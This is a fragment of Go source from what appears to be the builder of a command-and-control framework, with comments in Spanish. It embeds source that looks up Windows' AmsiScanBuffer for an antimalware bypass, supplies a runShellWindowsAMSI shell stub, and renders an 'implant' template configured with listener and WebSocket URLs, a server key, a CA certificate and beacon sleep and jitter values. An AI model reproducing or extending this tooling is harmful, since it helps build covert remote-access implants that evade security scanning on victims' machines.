	procName, _ := syscall.BytePtrFromString("AmsiScanBuffer")
	p, _, errno := procGetProcAddress.Call(h, uintptr(unsafe.Pointer(procName)))
	if p == 0 {
		return 0, 0, fmt.Errorf("GetProcAddress: %v", errno)
	}
	return h, p, nil
}

func osPipe() (*os.File, *os.File, error) {
	var r, w windows.Handle
	sa := &windows.SecurityAttributes{
		Length:        uint32(unsafe.Sizeof(windows.SecurityAttributes{})),
		InheritHandle: 1,
	}
	if err := windows.CreatePipe(&r, &w, sa, 0); err != nil {
		return nil, nil, err
	}
	// El read-end NO debe heredarse.
	if err := windows.SetHandleInformation(
		r, windows.HANDLE_FLAG_INHERIT, 0,
	); err != nil {
		windows.CloseHandle(r)
		windows.CloseHandle(w)
		return nil, nil, err
	}
	return os.NewFile(uintptr(r), "rtc2-pipe-r"),
		os.NewFile(uintptr(w), "rtc2-pipe-w"), nil
}
`

// amsiStubSource es el contenido de amsi_stub.go. Se escribe cuando
// target != windows. Provee el símbolo runShellWindowsAMSI como no-op
// para que main.go compile.
const amsiStubSource = `//go:build !windows

package main

import "fmt"

// runShellWindowsAMSI es un no-op en sistemas no-Windows. La variante
// real está en amsi_windows.go.
func runShellWindowsAMSI(cmdline string) ([]byte, string) {
	return nil, fmt.Sprintf("amsi: no disponible en %s", "non-windows")
}
`

type TemplateData struct {
	BuildID         string
	BuiltAt         string
	GoBuildTag      string
	ListenerURL     string
	WSURL           string
	ProfileName     string
	ServerPubKey    string
	CACertPEMBase64 string
	SleepSecs       int
	JitterPerc      int
	Format          string
}

func RenderTemplate(cfg *BuildConfig) ([]byte, error) {
	tmpl, err := template.New("implant").Parse(implantTemplate)
	if err != nil {
		return nil, err
	}

	data := TemplateData{
		BuildID:         cfg.BuildID,
		BuiltAt:         cfg.CreatedAt.Format("2006-01-02 15:04:05"),
		GoBuildTag:      goBuildTag(cfg.TargetOS),
		ListenerURL:     cfg.ListenerURL,
		WSURL:           cfg.WSURL,
		ProfileName:     cfg.ProfileName,
		ServerPubKey:    cfg.ServerPubKey,
		CACertPEMBase64: cfg.CACertPEMBase64,
		SleepSecs:       cfg.SleepSecs,
		JitterPerc:      cfg.JitterPerc,
		Format:          string(cfg.Format),
	}

	var buf bytes.Buffer
	if err := tmpl.Execute(&buf, data); err != nil {
		return nil, err
	}
	return buf.Bytes(), nil
}

func goBuildTag(os TargetOS) string {
	switch os {
	case TargetWindows:
		return "windows"
	case TargetLinux:
		return "linux"
	case TargetDarwin:
		return "darwin"
	default:
		return "ignore"
	}
}
